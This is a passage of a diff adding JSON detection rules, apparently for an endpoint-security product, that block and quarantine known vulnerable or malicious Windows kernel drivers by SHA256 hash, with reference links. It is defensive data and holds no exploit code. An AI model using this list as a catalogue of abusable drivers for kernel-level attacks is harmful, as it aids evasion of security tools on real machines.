+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18d775e0c20385cbf3960af4f34f692413d079c65d0a395cd5666aea1ba2abf0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "469ede74-dea3-54f0-aaf0-86af1b795905",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453072Z",
+ "creation_date": "2026-03-23T11:45:30.453076Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b688dd055ead2c915a139598c8db7962b42cb6e744eaacfcb338c093fc1f4e7",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46a13a09-3ebe-5bec-95c1-3ba9bd0bc34b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475945Z",
+ "creation_date": "2026-03-23T11:45:31.475958Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "338640f5bd468ab9235be611cd141dd55bc90b90f4c1d182b81ee28946870cf6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46a861e5-7908-547a-8e1f-eb47b8277b7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612868Z",
+ "creation_date": "2026-03-23T11:45:29.612881Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612887Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8fcc8ef2b27c0c0622d069981e39f112d3b3b0dbede053340bc157ba1316eab",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46aa5cbc-c18c-5ee4-bb6b-7c2aeb979b60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473608Z",
+ "creation_date": "2026-03-23T11:45:31.473612Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473623Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3729b57e32e9e97a62afe6ded0f9df82680df58165727a6f89470a29631364f0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46bd6960-86b7-5e4c-84e2-5ee8abe6019a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822264Z",
+ "creation_date": "2026-03-23T11:45:30.822266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4341b5814bf1b0291739f00c359f9dc1e3b8a66dede099086f9760f7f4e0885",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46c130a2-b83f-5a8e-b4f7-d96b98955594",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824258Z",
+ "creation_date": "2026-03-23T11:45:30.824260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31a0a87bfcfbd1e3b11d7b243d00afa64e2c929650abd4f25bbbab6076a09eb5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46c17287-e333-57c2-ba23-9c41a3043188",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486830Z",
+ "creation_date": "2026-03-23T11:45:31.486833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f4fce3299c057b842729aeeeed7357b9e49d39eb7cd441d8c27429c0e6f5344",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46c4b987-8405-5e51-abe3-16979c32d9e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463241Z",
+ "creation_date": "2026-03-23T11:45:30.463244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f98492c92e35042b09032e3d9aedc357e4df94fc840217fa1091046f9248a06",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46c60627-4024-5982-a0dc-53158bbd3bb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492303Z",
+ "creation_date": "2026-03-23T11:45:31.492305Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492310Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f8d010b6ac526ca64bd8e83b85f70d012e0c70f9fef7a994c81b23374cabdfd6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46c9f10d-bef5-5fc8-ad27-ab886dc9f099",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609111Z",
+ "creation_date": "2026-03-23T11:45:29.609113Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609118Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46e1caab-e832-52ef-a626-e70f095ffa09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146331Z",
+ "creation_date": "2026-03-23T11:45:31.146333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146338Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f831d25420ac04def39ee82c27d04a399c5c190c0e0b46f3ae9f633af9c67f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46e448ef-039e-52ed-add9-8a1b75817393",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822493Z",
+ "creation_date": "2026-03-23T11:45:31.822496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822505Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "478d8b424aea58c61633bd61bfb5c869b7b6657bec5c0e94b94ad420ead4087f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4700c6d9-95c2-53eb-8f37-fcd863c9d622",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831109Z",
+ "creation_date": "2026-03-23T11:45:30.831111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "866d0e5b9ee58fbd240988ec6339f4969e8f07f1c2db0f41aa5051d1a2cdb0d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "471c270b-b1f9-5924-8e0f-9ae7d30f098c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617626Z",
+ "creation_date": "2026-03-23T11:45:29.617628Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617634Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43c44fde2c29ea68e5af2c7684d069ae0ab94c9f0e790c5530d17ac3be7d4076",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "475d0c41-fe6d-5f32-bd5d-800a1ba62fa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807714Z",
+ "creation_date": "2026-03-23T11:45:31.807717Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d072f75fb30b7e26a0b4fd3b424b98ca0d027663ca4a7e93231d6113ed006d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4777c8c4-651e-52b8-8538-302579303eb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973755Z",
+ "creation_date": "2026-03-23T11:45:29.973757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973763Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76e807b6c0214e66455f09a8de8faad40b738982ca84470f0043de0290449524",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47877298-f828-54f3-815a-98a92bd7012d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160854Z",
+ "creation_date": "2026-03-23T11:45:31.160858Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea49294c0fd55e801029f6d91fb7214e430129847f000703f64ab55dea5c6383",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "478c5bcf-0e8e-52ed-bd6a-a6848fe623ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485103Z",
+ "creation_date": "2026-03-23T11:45:31.485107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a8e00fc3b744f3e5d3d92540224f47ef464dccb2be3643cb3edfe6b2c8190791",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "478efeeb-cfb1-5749-b6c5-bd400eed0311",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461070Z",
+ "creation_date": "2026-03-23T11:45:30.461073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461082Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b749566057dee0439f54b0d38935e5939b5cb011c46d7022530f748ebc63efe5",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4793c542-0ab5-57ca-a27b-eb5f6d91cda6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488908Z",
+ "creation_date": "2026-03-23T11:45:31.488910Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87905c83e18400b2f15f26e8e22ec9e245778f8e35d085b3277c044eae9cc4d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "479477a2-1417-5663-927e-489e9e90c8b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818291Z",
+ "creation_date": "2026-03-23T11:45:31.818295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818303Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8aef476014f44450ac2b1bd46946473f51aa6cba2fbfa0b65d9fa68d34398def",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "47a88448-4b89-5a9e-8cef-a3633f100845",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476707Z",
+ "creation_date": "2026-03-23T11:45:30.476711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476720Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ce5188745ffcb5dc8304dac97cd037360600d8eb4739cfdbfb06bcd0efd72e4",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
